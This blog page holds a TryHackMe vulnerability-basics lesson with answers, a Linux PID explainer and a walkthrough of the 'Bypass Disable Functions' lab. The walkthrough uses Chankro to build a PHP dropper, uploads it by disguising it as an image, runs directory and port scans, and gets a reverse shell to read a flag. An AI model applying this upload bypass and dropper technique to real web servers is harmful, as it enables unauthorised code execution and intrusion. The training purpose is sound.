
  • TryHackMe Vulnerability 101

     

    TryHackMe Vulnerability 101

    Cybersecurity is big business in the modern-day world. The hacks that we hear about in newspapers are from exploiting vulnerabilities. In this room, we're going to explain exactly what a vulnerability is, the types of vulnerabilities and how we can exploit these for success in our penetration testing endeavours.


    An enormous part of penetration testing is knowing the skills and resources for whatever situation you face. This room is going to introduce you to some resources that are essential when researching vulnerabilities, specifically, you are going to be introduced to:


    • What vulnerabilities are
    • Why they're worthy of learning about
    • How vulnerabilities are rated
    • Databases for vulnerability research
    • A showcase of how vulnerability research is used on ACKme's engagement





    Introduction to Vulnerabilities


    A vulnerability in cybersecurity is defined as a weakness or flaw in the design, implementation or behaviours of a system or application. An attacker can exploit these weaknesses to gain access to unauthorised information or perform unauthorised actions. The term “vulnerability” has many definitions by cybersecurity bodies. However, there is minimal variation between them all.

    For example, NIST defines a vulnerability as “weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source”.

    Vulnerabilities can originate from many factors, including a poor design of an application or an oversight of the intended actions from a user.

    We will come on to discuss the various types of vulnerabilities in a later room. However, for now, we should know that there are arguably five main categories of vulnerabilities:

     

    Operating System: These types of vulnerabilities are found within Operating Systems (OSs) and often result in privilege escalation.
    (Mis)Configuration-based: These types of vulnerability stem from an incorrectly configured application or service. For example, a website exposing customer details.
    Weak or Default Credentials: Applications and services that have an element of authentication will come with default credentials when installed. For example, an administrator dashboard may have the username and password of "admin". These are easy to guess by an attacker.
    Application Logic: These vulnerabilities are a result of poorly designed applications. For example, poorly implemented authentication mechanisms that may result in an attacker being able to impersonate a user.
    Human-Factor: Human-Factor vulnerabilities are vulnerabilities that leverage human behaviour. For example, phishing emails are designed to trick humans into believing they are legitimate.

     







    1) An attacker has been able to upgrade the permissions of their system account from "user" to "administrator". What type of vulnerability is this?

    Ans- Operating System



    2) You manage to bypass a login panel using cookies to authenticate. What type of vulnerability is this?

    Ans- Application logic






    Scoring Vulnerabilities (CVSS & VPR)



    Vulnerability management is the process of evaluating, categorising and ultimately remediating threats (vulnerabilities) faced by an organisation.

    It is arguably impossible to patch and remedy every single vulnerability in a network or computer system, and doing so is sometimes a waste of resources.

    After all, only approximately 2% of vulnerabilities ever end up being exploited (Kenna Security, 2020). Instead, it is all about addressing the most dangerous vulnerabilities and reducing the likelihood of an attack vector being used to exploit a system.

    This is where vulnerability scoring comes into play. Vulnerability scoring serves a vital role in vulnerability management and is used to determine the potential risk and impact a vulnerability may have on a network or computer system. For example, the popular Common Vulnerability Scoring System (CVSS) awards points to a vulnerability based upon its features, availability, and reproducibility.


    Of course, as always in the world of IT, there is never just one framework or proposed idea. Let’s explore two of the more common frameworks and analyse how they differ.



    Common Vulnerability Scoring System


    First introduced in 2005, the Common Vulnerability Scoring System (or CVSS) is a very popular framework for vulnerability scoring and has had three major iterations. As it stands, the current version is CVSSv3.1 (with version 4.0 currently in draft). A score is essentially determined by factors such as the following (but many more):



    1. How easy is it to exploit the vulnerability?
    2. Do exploits exist for this?
    3. How does this vulnerability interfere with the CIA triad?
     
     

    In fact, there are so many variables that you have to use a calculator to figure out the score using this framework. A vulnerability is given a classification (out of five) depending on the score it has been assigned. I have put the Qualitative Severity Rating Scale and its score ranges into the table below.






     

    Rating    Score
    None      0
    Low       0.1-3.9
    Medium    4.0-6.9
    High      7.0-8.9
    Critical  9.0-10.0

     


    However, CVSS is not a magic bullet. Let's analyse some of the advantages and disadvantages of CVSS in the table below:




     

    Advantages of CVSS:
    • CVSS has been around for a long time.
    • CVSS is popular in organisations.
    • CVSS is a free framework to adopt and is recommended by organisations such as NIST.

    Disadvantages of CVSS:
    • CVSS was never designed to help prioritise vulnerabilities; instead, it just assigns a value of severity.
    • CVSS heavily assesses vulnerabilities on an exploit being available. However, only 20% of all vulnerabilities have an exploit available (Tenable, 2020).
    • Vulnerabilities rarely change scoring after assessment, despite the fact that new developments such as exploits may be found.

     





    Vulnerability Priority Rating (VPR)


    The VPR framework is a much more modern framework in vulnerability management - developed by Tenable, an industry solutions provider for vulnerability management. This framework is considered to be risk-driven; meaning that vulnerabilities are given a score with a heavy focus on the risk a vulnerability poses to the organisation itself, rather than factors such as impact (like with CVSS).

    Unlike CVSS, VPR scoring takes into account the relevancy of a vulnerability. For example, no risk is considered regarding a vulnerability if that vulnerability does not apply to the organisation (i.e. they do not use the software that is vulnerable). VPR is also considerably dynamic in its scoring, where the risk that a vulnerability may pose can change almost daily as it ages.

    VPR uses a similar scoring range to CVSS, which I have also put into the table below. However, two notable differences are that VPR does not have a "None/Informational" category, and, because VPR uses a different scoring method, the same vulnerability will have a different score under VPR than under CVSS.






     

    Rating    Score
    None      0
    Low       0.1-3.9
    Medium    4.0-6.9
    High      7.0-8.9
    Critical  9.0-10.0

     






    Let's recap some of the advantages and disadvantages of using the VPR framework in the table below.





     

    Advantages of VPR:
    • VPR is a modern framework that is grounded in the real world.
    • VPR considers over 150 factors when calculating risk.
    • VPR is risk-driven and is used by organisations to help prioritise patching vulnerabilities.
    • Scorings are not final and are very dynamic, meaning the priority a vulnerability should be given can change as the vulnerability ages.

    Disadvantages of VPR:
    • VPR is not open-source like some other vulnerability management frameworks.
    • VPR can only be adopted as part of a commercial platform.
    • VPR does not consider the CIA triad to the extent that CVSS does, meaning that risk to the confidentiality, integrity and availability of data does not play a large factor in scoring vulnerabilities when using VPR.

     



    1) What year was the first iteration of CVSS published?

    Ans- 2005




    2) If you wanted to assess vulnerability based on the risk it poses to an organisation, what framework would you use?

    Note: We are looking for the acronym here.

    Ans- VPR





    3) If you wanted to use a framework that was free and open-source, what framework would that be?

    Note: We are looking for the acronym here.

    Ans- CVSS






    Vulnerability Databases


    Throughout your journey in cybersecurity, you will often come across a multitude of different applications and services. For example, CMSs all have the same purpose, yet often have very different designs and behaviours (and, in turn, potentially different vulnerabilities).

    Thankfully for us, there are resources on the internet that keep track of vulnerabilities for all sorts of software, operating systems and more! This room will showcase two databases that we can use to look up existing vulnerabilities for applications discovered in our infosec journey, specifically the following websites:

    1. NVD (National Vulnerability Database)

    2. Exploit-DB




    Before we dive into these two resources, let's ensure that our understanding of some fundamental key terms is on the same page:



     

    Vulnerability: A vulnerability is defined as a weakness or flaw in the design, implementation or behaviours of a system or application.
    Exploit: An exploit is something such as an action or behaviour that utilises a vulnerability on a system or application.
    Proof of Concept (PoC): A PoC is a technique or tool that often demonstrates the exploitation of a vulnerability.

     



    NVD – National Vulnerability Database


    The National Vulnerability Database is a website that lists all publicly categorised vulnerabilities. In cybersecurity, vulnerabilities are classified under “Common Vulnerabilities and Exposures” (or CVE for short). These CVEs have the format CVE-YEAR-IDNUMBER. For example, the vulnerability that the famous WannaCry malware used was CVE-2017-0144. NVD allows you to see all the CVEs that have been confirmed, using filters by category and month of submission. For example, it is three days into August and there have already been 223 new CVEs submitted to this database.








    While this website helps keep track of new vulnerabilities, it is not great when searching for vulnerabilities for a specific application or scenario.

     


    Exploit-DB


    Exploit-DB is a resource that we, as hackers, will find much more helpful during an assessment. Exploit-DB retains exploits for software and applications stored under the name, author and version of the software or application.

    We can use Exploit-DB to look for snippets of code (known as Proof of Concepts) that are used to exploit a specific vulnerability.






    1) Using NVD, how many CVEs were submitted in July 2021?

    Ans -



    2) Who is the author of Exploit-DB?

    Ans -






    An Example of Finding a Vulnerability


    In this task, I’m going to demonstrate the process of finding one minor vulnerability, coupled with some research of the vulnerability databases leading to a much more valuable vulnerability and exploit ultimately.

    Throughout an assessment, you will often combine multiple vulnerabilities to get results. For example, in this task, we will leverage the “Version Disclosure” vulnerability to find out the version of an application. With this version, we can then use Exploit-DB to search for any exploits that work with that specific version.

    Applications and software usually have a version number. This information is usually left with good intentions; for example, the author can support multiple versions of the software and the likes. Or sometimes, left unintentionally.

    For example, in the screenshot below, we can see that the name and version number of this application is “Apache Tomcat 9.0.17”.








    With this information in hand, let’s use the search filter on Exploit-DB to look for any exploits that may apply to “Apache Tomcat 9.0.17”.









    Great! After searching Exploit-DB, there are a total of five exploits that may be useful to us for this specific version of the application.



    1) What type of vulnerability did we use to find the name and version of the application in this example?

    Ans-




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



     

  • TryHackMe Bypass Disable Functions walkthrough

     

    TryHackMe Bypass Disable Functions walkthrough

     

     

    Bypass Disable Functions


    Practice bypassing disabled dangerous features that run operating system commands or start processes.

    This vulnerability occurs in web applications that allow a file to be uploaded without it being checked by a control that curbs potential dangers.

    It allows an attacker to upload files containing code (scripts such as .php, .aspx and more) and run them on the same server; more information is given in this room.


    Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other, perhaps less well-known functions such as dl() (which allows you to load a PHP extension dynamically) can go unnoticed by the system administrator and remain enabled. The usual step in an intrusion test is to list which functions are enabled, in case any have been forgotten.

    One of the easiest techniques to implement, and one that is not very widespread, is to abuse the mail() and putenv() functions. This technique is not new; it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function we can modify environment variables, allowing us to assign any value we want to the variable LD_PRELOAD. Roughly, LD_PRELOAD makes the dynamic loader load a .so library before the rest of the libraries, so that if a program uses a function of a library (libc.so, for example), it will execute the one in our library instead of the one it should. In this way we can hijack or "hook" functions, modifying their behaviour at will.
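
    From the defender's side, the practical check is whether the disable_functions list actually covers the functions this technique relies on. The following Python is an added example (not from the room, this post or Chankro): it parses a php.ini-style disable_functions directive, compares it with the eight functions the room's target disables plus the forgotten ones named above (putenv, mail, dl), and emits a hardened directive. The php.ini excerpt it audits is constructed, and the function names are my own.

```python
"""Audit php.ini's disable_functions against the functions the
mail()+putenv()/LD_PRELOAD technique needs. Added example; the php.ini
text below is constructed to mirror the room's target configuration."""
import re

# The eight functions phpinfo on the room's target lists as disabled.
DISABLED_ON_TARGET = ["exec", "passthru", "shell_exec", "system",
                      "proc_open", "popen", "curl_exec", "curl_multi_exec"]
# Functions the walkthrough says get forgotten: putenv() sets LD_PRELOAD,
# mail() spawns sendmail with that environment, dl() loads an extension.
OFTEN_FORGOTTEN = ["putenv", "mail", "dl"]
RECOMMENDED = DISABLED_ON_TARGET + OFTEN_FORGOTTEN

# Constructed php.ini excerpt: the commented-out line must be ignored.
SAMPLE_INI = """\
[PHP]
; disable_functions = exec,system   ; old value, commented out
expose_php = Off
disable_functions = "exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec"
open_basedir = /var/www/html
"""


def parse_disable_functions(ini_text):
    """Return the set of names disabled by the last active
    disable_functions line (php.ini applies the last occurrence).
    A ';' starts a comment; values may be quoted and comma/space separated."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        key, sep, value = line.partition("=")
        if not sep or key.strip().lower() != "disable_functions":
            continue
        value = value.strip().strip("\"'")
        disabled = {f.strip().lower()
                    for f in re.split(r"[,\s]+", value) if f.strip()}
    return disabled


def audit(ini_text, required=RECOMMENDED):
    """Report which recommended functions are still callable and build
    the directive that closes the gap (weak setting -> hardened setting)."""
    disabled = parse_disable_functions(ini_text)
    missing = [f for f in required if f not in disabled]
    hardened = "disable_functions = " + ",".join(sorted(disabled | set(required)))
    return {"disabled": sorted(disabled), "missing": missing, "hardened": hardened}


if __name__ == "__main__":
    report = audit(SAMPLE_INI)
    print("disabled now :", ", ".join(report["disabled"]))
    print("still enabled:", ", ".join(report["missing"]))
    print(report["hardened"])
```

    Disabling mail() is only safe for applications that do not send email from PHP, so check that before applying the hardened directive.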



    Chankro: tool to evade disable_functions and open_basedir


    Through Chankro, we generate a PHP script that acts as a dropper: it creates on the server a .so library and the binary (a meterpreter, for example) or bash script (a reverse shell, for example) that we want to execute freely, and then calls putenv() and mail() to launch the process.




    Install tool:


    git clone https://github.com/TarlogicSecurity/Chankro.git
    cd Chankro
    python2 chankro.py --help



    python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

    --arch = Architecture of the victim system, 32 or 64.
    --input = File with the payload to execute.
    --output = Name of the PHP file that will be created; this is the file you will need to upload.
    --path = The absolute path where the uploaded PHP file will be located. For example, if the file is uploaded into the uploads folder: DOCUMENTROOT + uploads.




     


     

    Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.

     




     

    My command run successfully, and I created a file in the directory with the output of the command.

     

    First of all, we will start the machine of the TryHackMe room Bypass Disable Functions and then visit the room's IP. What do we see there? There is an upload page where we can upload any image, and we can upload an executable file via Burp Suite, because we have to upload the PHP file by bypassing the check.

     

     




     

    After uploading the malicious file we have to check which directory it was uploaded to, so we will use gobuster to find the directory.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.61.162/
    [+] Method:                  GET
    [+] Threads:                 100
    [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              php
    [+] Timeout:                 10s
    ===============================================================
    2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
    ===============================================================
    /uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
    /assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] 
    /cv.php               (Status: 200) [Size: 4153]                                  
    Progress: 98580 / 441122 (22.35%) 
    
    
    

     

     

    If you want to check which ports are open on this site, you can do this with Nmap or RustScan.



     

     

      ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt                                                                 1 ⨯
    [~] Automatically increasing ulimit value to 5000.
    Open 10.10.61.162:22
    Open 10.10.61.162:80
    [~] Starting Nmap
    [>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162
    
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
    NSE: Loaded 153 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Initiating Ping Scan at 12:17
    Scanning 10.10.61.162 [2 ports]
    Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:17
    Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
    DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating Connect Scan at 12:17
    Scanning 10.10.61.162 [2 ports]
    Discovered open port 22/tcp on 10.10.61.162
    Discovered open port 80/tcp on 10.10.61.162
    Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
    Initiating Service scan at 12:17
    Scanning 2 services on 10.10.61.162
    Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
    NSE: Script scanning 10.10.61.162.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 9.83s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 1.21s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Nmap scan report for 10.10.61.162
    Host is up, received syn-ack (0.24s latency).
    Scanned at 2021-09-16 12:17:30 IST for 18s
    
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
    |   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
    |   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
    80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Ecorp - Jobs
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ 
      

     

     

    We found the upload directory: /uploads

     

     

     


     

     

     

    When inspecting the site with the tool Wappalyzer, you can see that the web application uses PHP as its programming language.

     

     


     

     

    With this in mind, we can see that the file phpinfo.php is available; this file gives us information about the server configuration and, for example, the settings used to interpret PHP.

     

     


     

     

    Looking at the information phpinfo gives us, we can see a section called disable_functions, and in it many critical functions are listed, such as:



        exec
        passthru
        shell_exec
        system
        proc_open
        popen
        curl_exec
        curl_multi_exec

     

    As we can see, we are very limited when it comes to uploading a PHP file that contains code of our choosing, but after investigating, and thanks to the information provided by this machine, we can make use of the tool Chankro.

    This tool allows us to execute commands through the mail() and putenv() functions, by changing an environment variable so that the sendmail binary launched by mail() runs our code. A low-level explanation of what it does is given in this article.

    To test whether the tool works, we are going to execute whoami and write its output into the absolute path of the web root, which is /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/. This path is known because phpinfo shows where the site is hosted.


    I will use the tool Chankro with the following parameters, but first we create a c.sh file:

    sudo nano c.sh

     

     






     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
    └─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads
    
    
         -=[ Chankro ]=-
        -={ @TheXC3LL }=-
    
    
    [+] Binary file: c.sh
    [+] Architecture: x64
    [+] Final PHP: hackingtruth-exploit.php
    
    
    [+] File created!
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
    └─$     
    

     

    Once the malicious PHP file has been created by the tool, I go to the web page and upload it.

     

     

     



     

    At file-upload time we intercept the request, change the Content-Type to image/jpeg and write a GIF87a header.

     

    What is GIF87a?

    GIF87a is the original format for indexed colour images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animation capabilities.

     

     

    Check whether the file was uploaded to the /uploads directory.



     


     

     

     

    Gaining Access 


    Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code that, when executed, starts a reverse shell to my machine on port 443:


    With this in mind, and having modified the file command.sh, I recreate the file winsad.php with Chankro; once it is created I add the header 'GIF89a;' and upload the file.

    Since I uploaded the PHP file again, browsing to the path where winsad.php is hosted, I can see that the code is interpreted and gives me the shell:

     

    Start a netcat listener and then open the uploaded file:

    nc -nvlp 4444

     





    Once inside the machine we can go to the home directory of the user s4vi and view the flag.



    www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
    <ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home                       
    www-data@ubuntu:/home$ ls -la
    ls -la
    total 12
    drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
    drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
    drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
    www-data@ubuntu:/home$ cd s4vi
    cd s4vi
    www-data@ubuntu:/home/s4vi$ 
    ls -la
    
    
    
    www-data@ubuntu:/home/s4vi$ ls -la
    total 44
    drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
    drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
    -rw------- 1 root root 6127 Jun 23 23:49 .bash_history
    -rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
    -rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
    drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
    drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
    -rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
    -rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
    -rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
    -rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
    www-data@ubuntu:/home/s4vi$ 
    
    
    
    www-data@ubuntu:/home/s4vi$ cat flag.txt
    cat cat flag.txt
    cat: cat: No such file or directory
    thm{bypass_d1sable_functions_1n_php}
    www-data@ubuntu:/home/s4vi$ 
    
    
    
    

     

    We got it!!! 






     

  • PID In Linux

     

    PID In Linux

     

     

    PID In Linux


    A PID is an acronym for process identification number. A PID is automatically assigned to each process when it is created on a Linux operating system. init or systemd is always the first process on a Linux operating system and is the parent of all other processes.




    How do I find the PID in Linux?


    1) Open the terminal application.
    2) Type the pidof command as follows to find the PID of the firefox process: pidof firefox
    3) Or use the ps command along with the grep command as follows: ps aux | grep -i firefox
    4) To look up or signal processes based on name, use.


     

    Every time a user or the system (Linux) launches a program, the kernel will create a process. A process holds execution details of the program in memory such as its input and output data, variables and so on.

    Importantly, since Linux is a multitasking operating system, it executes several programs simultaneously.

    The kernel identifies each process using a process ID (PID); every instance of a process must have a PID that is unique among all other processes, assigned when the process is invoked, to avoid any execution errors.

    The /proc file system stores information about currently running processes on your system, it contains directories for each process.



    $ ls /proc
    OR
    $ ls /proc | less
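
    To show what ps and pidof are actually reading, the following Python is an added example (not part of the original post): it walks the numeric directories under /proc, parses each process's status file into its name, PID and parent PID, and answers pidof-style and parent/child lookups. The status text and process table used for the checks are constructed; the function names are my own.

```python
"""Walk /proc the way ps and pidof do. Added example; assumes a Linux
/proc filesystem for list_processes(), while the parsing and lookup
functions run on the constructed samples below."""
import os

# Constructed /proc/<pid>/status excerpt (real files use 'Key:<tab>value').
SAMPLE_STATUS = """\
Name:\tfirefox
Umask:\t0022
State:\tS (sleeping)
Tgid:\t4242
Pid:\t4242
PPid:\t1
"""

# Constructed process table: PID 1 (init/systemd) parents a shell and firefox.
SAMPLE_PROCS = [
    {"name": "systemd", "pid": 1, "ppid": 0, "state": "S (sleeping)"},
    {"name": "bash", "pid": 1337, "ppid": 1, "state": "S (sleeping)"},
    {"name": "firefox", "pid": 4242, "ppid": 1, "state": "S (sleeping)"},
    {"name": "firefox", "pid": 4300, "ppid": 4242, "state": "R (running)"},
]


def parse_status(text):
    """Parse /proc/<pid>/status into the fields ps-style tools rely on.
    Note: the kernel truncates Name to 15 characters."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return {
        "name": fields.get("Name", ""),
        "pid": int(fields.get("Pid", 0)),
        "ppid": int(fields.get("PPid", 0)),
        "state": fields.get("State", ""),
    }


def list_processes(proc="/proc"):
    """Every directory under /proc whose name is a number is one running
    process; PIDs are transient, so a process may vanish mid-walk."""
    procs = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "status")) as fh:
                procs.append(parse_status(fh.read()))
        except OSError:
            continue  # exited between listdir() and open()
    return sorted(procs, key=lambda p: p["pid"])


def pids_by_name(name, procs):
    """pidof-style lookup: PIDs whose process name matches exactly."""
    return [p["pid"] for p in procs if p["name"] == name]


def children_of(ppid, procs):
    """PIDs whose parent is ppid; children_of(1, ...) is init's subtree."""
    return [p["pid"] for p in procs if p["ppid"] == ppid]


if __name__ == "__main__":
    procs = list_processes()
    me = next((p for p in procs if p["pid"] == os.getpid()), None)
    if me:
        print("this script: pid %d, parent %d, name %s"
              % (me["pid"], me["ppid"], me["name"]))
    print("children of PID 1:", children_of(1, procs))
    print("PIDs named bash:", pids_by_name("bash", procs))
```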

     

     

     


    You can monitor processes and their PIDs using traditional Linux commands such as ps, top and relatively new glances command plus many more as in the examples below:


    $ ps aux
     

     

    Show Running Processes with PID
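    As an added example (not part of the original post), the Python script below does the lookup described above programmatically: it parses `ps aux` output and matches on the executable's basename, the way pidof does, and contrasts that with the naive `ps aux | grep -i firefox` approach, which also reports the grep process itself and any unrelated process whose arguments happen to mention the name. The `ps aux` sample is constructed for the demonstration; `live_pids_by_name` reads the real /proc on a Linux host.

```python
"""Find PIDs by program name from `ps aux` output and from /proc.

Added example; the sample `ps aux` output below is constructed, not a real
capture. Matching mirrors pidof (compare the executable's basename) instead
of grepping the whole line, which is why the `grep -i firefox` process and
the `vim firefox-notes.txt` process are not reported as firefox.
"""
import os
import posixpath

# Constructed sample of `ps aux` output (11 columns; COMMAND is the last).
SAMPLE_PS_AUX = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.1 169000 11000 ?        Ss   09:00   0:02 /sbin/init splash
atul        2345  3.2  4.0 3100000 330000 ?      Sl   09:05   1:10 /usr/lib/firefox/firefox
atul        2401  0.8  2.1 2500000 170000 ?      Sl   09:05   0:20 /usr/lib/firefox/firefox -contentproc -childID 1
atul        3102  0.0  0.0   9000  3000 pts/0    S+   09:10   0:00 grep -i firefox
atul        3200  0.0  0.0  12000  4000 pts/1    S    09:11   0:00 vim firefox-notes.txt
"""


def parse_ps_aux(text):
    """Yield (pid, command_line) tuples from `ps aux` output, skipping the header."""
    for line in text.splitlines()[1:]:
        # COMMAND may contain spaces, so split at most 10 times and keep the rest whole.
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        yield int(fields[1]), fields[10]


def pids_by_name(text, name):
    """PIDs whose executable basename equals `name` (pidof-style matching)."""
    hits = []
    for pid, cmdline in parse_ps_aux(text):
        exe = cmdline.split()[0]
        if posixpath.basename(exe) == name:
            hits.append(pid)
    return hits


def pids_by_grep(text, needle):
    """What `ps aux | grep -i needle` reports: every line containing the text,
    including grep itself and unrelated processes whose arguments mention it."""
    return [pid for pid, cmdline in parse_ps_aux(text) if needle.lower() in cmdline.lower()]


def live_pids_by_name(name):
    """Same matching against the running system via /proc/<pid>/comm (Linux only).
    The kernel truncates comm to 15 characters, so the name is truncated too."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                comm = fh.read().strip()
        except OSError:  # the process exited between listdir() and open()
            continue
        if comm == name[:15]:
            hits.append(int(entry))
    return sorted(hits)


if __name__ == "__main__":
    print("pidof-style:", pids_by_name(SAMPLE_PS_AUX, "firefox"))  # [2345, 2401]
    print("grep-style: ", pids_by_grep(SAMPLE_PS_AUX, "firefox"))  # [2345, 2401, 3102, 3200]
```

    The grep-style result includes PID 3102 (the grep itself) and 3200 (an editor with "firefox" in a filename); basename matching returns only the two real firefox processes.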

     

     


     

     

     





  • TryHackMe Dunkle Materie

    TryHackMe Dunkle Materie


    Hello guys, this is a writeup for the Dunkle Materie room from the TryHackMe platform. This room is a medium room that lets users investigate a ransomware attack using an application called ProcDOT.


